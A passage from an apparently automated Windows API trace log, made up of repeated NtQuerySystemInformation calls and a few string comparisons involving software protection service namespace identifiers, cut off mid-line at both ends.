(SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0271.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0271.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0271.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0271.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.296] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.306] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0271.314] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc80, Length=0x28, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0271.324] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0271.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, 